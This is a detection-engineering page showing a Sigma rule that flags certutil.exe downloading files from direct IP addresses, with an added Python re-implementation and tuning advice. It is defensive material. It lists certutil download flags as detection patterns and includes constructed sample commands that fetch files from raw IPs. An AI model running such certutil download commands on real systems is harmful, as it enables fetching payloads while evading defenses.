Suspicious File Downloaded From Direct IP Via Certutil.EXE
Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
Sigma rule
title: Suspicious File Downloaded From Direct IP Via Certutil.EXE
id: 13e6fe51-d478-4c7e-b0f2-6da9b400a829
related:
    - id: 19b08b1c-861d-4e75-a1ef-ea0c1baf202b # Direct IP download
      type: similar
    - id: 42a5f1e7-9603-4f6d-97ae-3f37d130d794 # File sharing download
      type: similar
status: test
description: Detects the execution of certutil with certain flags that allow the utility to download files from direct IPs.
references:
    - https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil
    - https://forensicitguy.github.io/agenttesla-vba-certutil-download/
    - https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/
    - https://twitter.com/egre55/status/1087685529016193025
    - https://lolbas-project.github.io/lolbas/Binaries/Certutil/
    - https://twitter.com/_JohnHammond/status/1708910264261980634
author: Nasreddine Bencherchali (Nextron Systems)
date: 2023-02-15
tags:
    - attack.defense-evasion
    - attack.t1027
logsource:
    category: process_creation
    product: windows
detection:
    selection_img:
        - Image|endswith: '\certutil.exe'
        - OriginalFileName: 'CertUtil.exe'
    selection_flags:
        CommandLine|contains:
            - 'urlcache '
            - 'verifyctl '
    selection_http:
        CommandLine|contains:
            - '://1'
            - '://2'
            - '://3'
            - '://4'
            - '://5'
            - '://6'
            - '://7'
            - '://8'
            - '://9'
    # filter_local_ips:
    #     # Note: Uncomment this filter if you want to exclude local IPs
    #     CommandLine|contains:
    #         - '://10.' # 10.0.0.0/8
    #         - '://192.168.' # 192.168.0.0/16
    #         - '://172.16.' # 172.16.0.0/12
    #         - '://172.17.'
    #         - '://172.18.'
    #         - '://172.19.'
    #         - '://172.20.'
    #         - '://172.21.'
    #         - '://172.22.'
    #         - '://172.23.'
    #         - '://172.24.'
    #         - '://172.25.'
    #         - '://172.26.'
    #         - '://172.27.'
    #         - '://172.28.'
    #         - '://172.29.'
    #         - '://172.30.'
    #         - '://172.31.'
    #         - '://127.' # 127.0.0.0/8
    #         - '://169.254.' # 169.254.0.0/16
    filter_main_seven_zip:
        CommandLine|contains: '://7-' # For https://7-zip.org/
    condition: all of selection_* and not 1 of filter_main_*
falsepositives:
    - Unknown
level: high
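To see what the rule's string matching does and does not catch, here is an added Python re-implementation of its selections and filters, written for this page and not part of the rule or the SigmaHQ project, run over a few constructed process_creation events. It also wires in the commented-out filter_local_ips block as an option so the effect of enabling it is visible. Field names follow the Sigma process_creation taxonomy the rule uses (Image, OriginalFileName, CommandLine); the IP addresses, paths and file names in the sample events are constructed, and Sigma's default case-insensitive string matching is assumed.

```python
# Added example: re-implementation of the Sigma rule's matching logic.
# Not the rule's own code; field names follow the Sigma process_creation taxonomy.

FLAGS = ("urlcache ", "verifyctl ")                      # selection_flags
DIRECT_IP_PREFIXES = tuple(f"://{d}" for d in "123456789")  # selection_http
SEVEN_ZIP_FILTER = ("://7-",)                             # filter_main_seven_zip
# The rule's commented-out filter_local_ips block, expanded from its CIDR comments.
LOCAL_IP_PREFIXES = (
    "://10.", "://192.168.", "://127.", "://169.254.",
    *(f"://172.{n}." for n in range(16, 32)),
)


def _contains_any(value, needles):
    """Sigma 'contains' over a list: true if any needle is a substring."""
    return any(n in value for n in needles)


def matches(event, exclude_local_ips=False):
    """Return True if the event satisfies
    'all of selection_* and not 1 of filter_main_*'.

    exclude_local_ips=False mirrors the rule as shipped; True applies the
    optional filter_local_ips block as if it were an active filter."""
    # Sigma string modifiers are case-insensitive by default (assumption).
    image = event.get("Image", "").lower()
    original = event.get("OriginalFileName", "").lower()
    cmd = event.get("CommandLine", "").lower()

    # selection_img is a list of maps, so either entry is enough.
    sel_img = image.endswith("\\certutil.exe") or original == "certutil.exe"
    sel_flags = _contains_any(cmd, FLAGS)
    sel_http = _contains_any(cmd, DIRECT_IP_PREFIXES)
    if not (sel_img and sel_flags and sel_http):
        return False

    if _contains_any(cmd, SEVEN_ZIP_FILTER):
        return False
    if exclude_local_ips and _contains_any(cmd, LOCAL_IP_PREFIXES):
        return False
    return True


# Constructed sample events (documentation-range and private IPs, made-up names).
SAMPLE_EVENTS = [
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil.exe -urlcache -split -f http://203.0.113.10/update.dat update.dat"},
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -f https://7-zip.org/a/7z.exe 7z.exe"},       # 7-zip filter
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -urlcache -f http://10.0.0.5/agent.msi agent.msi"},     # private IP
    {"Image": "C:\\Windows\\System32\\certutil.exe",
     "CommandLine": "certutil -hashfile C:\\Users\\a\\file.txt SHA256"},               # no download flag
    {"Image": "C:\\Temp\\cu.exe", "OriginalFileName": "CertUtil.exe",
     "CommandLine": "cu.exe -verifyctl -f http://198.51.100.7/x.cab"},                  # caught via OriginalFileName
]


def run(events, exclude_local_ips=False):
    """Return the CommandLine of every event the rule would alert on."""
    return [e["CommandLine"] for e in events if matches(e, exclude_local_ips)]


if __name__ == "__main__":
    for hit in run(SAMPLE_EVENTS):
        print("ALERT:", hit)
    print("with local IPs excluded:", len(run(SAMPLE_EVENTS, exclude_local_ips=True)), "hits")
```

Two things the sample run makes visible. First, `'://1'` through `'://9'` are prefix matches on the character after the scheme, so any host name beginning with a digit also matches; that is exactly why filter_main_seven_zip exists, and tuning should add further `filter_main_*` entries rather than loosen the selections. Second, the condition subtracts only `1 of filter_main_*`, while the commented block is named `filter_local_ips`; if you uncomment it, rename it (for example to `filter_main_local_ips`) or widen the condition, otherwise it is parsed but never applied.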
Related rules
- Base64 Encoded PowerShell Command Detected
- Certificate Exported Via Certutil.EXE
- ConvertTo-SecureString Cmdlet Usage Via CommandLine
- Decode Base64 Encoded Text
- Decode Base64 Encoded Text -MacOs